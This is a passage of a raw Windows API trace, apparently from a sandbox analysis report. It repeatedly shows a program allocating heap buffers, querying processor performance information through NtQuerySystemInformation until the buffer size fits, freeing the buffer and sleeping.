[0174.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.397] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.398] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.398] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.398] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.399] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.399] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.399] Sleep (dwMilliseconds=0x110) [0174.445] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.445] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.446] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.446] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.446] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.447] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.447] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.447] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.448] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.451] Sleep (dwMilliseconds=0x110) [0174.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.524] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.525] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.525] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.531] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.534] Sleep (dwMilliseconds=0x110) [0174.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.643] Sleep (dwMilliseconds=0x110) [0174.742] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.742] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.743] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.743] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.743] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.744] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.744] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.744] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.745] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.745] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.745] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.746] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.746] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.750] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.750] Sleep (dwMilliseconds=0x110) [0174.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0174.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.958] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0174.958] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.959] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.959] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0174.959] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0174.960] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.960] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0174.960] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0174.964] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.964] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0174.965] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0174.966] Sleep (dwMilliseconds=0x110) [0175.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.022] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.023] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.024] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.024] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.025] Sleep (dwMilliseconds=0x110) [0175.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.087] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.089] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.089] Sleep (dwMilliseconds=0x110) [0175.104] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.104] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.104] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.113] Sleep (dwMilliseconds=0x110) [0175.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.163] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.164] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.164] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.168] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.171] Sleep (dwMilliseconds=0x110) [0175.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.193] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.194] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.194] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.195] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.195] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.195] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.197] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.197] Sleep (dwMilliseconds=0x110) [0175.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.222] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.222] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.222] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.225] Sleep (dwMilliseconds=0x110) [0175.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0175.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.302] Sleep (dwMilliseconds=0x110) [0175.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0175.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0175.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0175.381] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0175.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0175.382] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0175.382] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0175.385] 